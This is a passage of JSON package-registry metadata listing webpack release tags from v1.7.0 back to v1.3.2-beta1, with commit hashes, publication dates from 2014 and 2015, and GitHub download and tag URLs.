a79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-b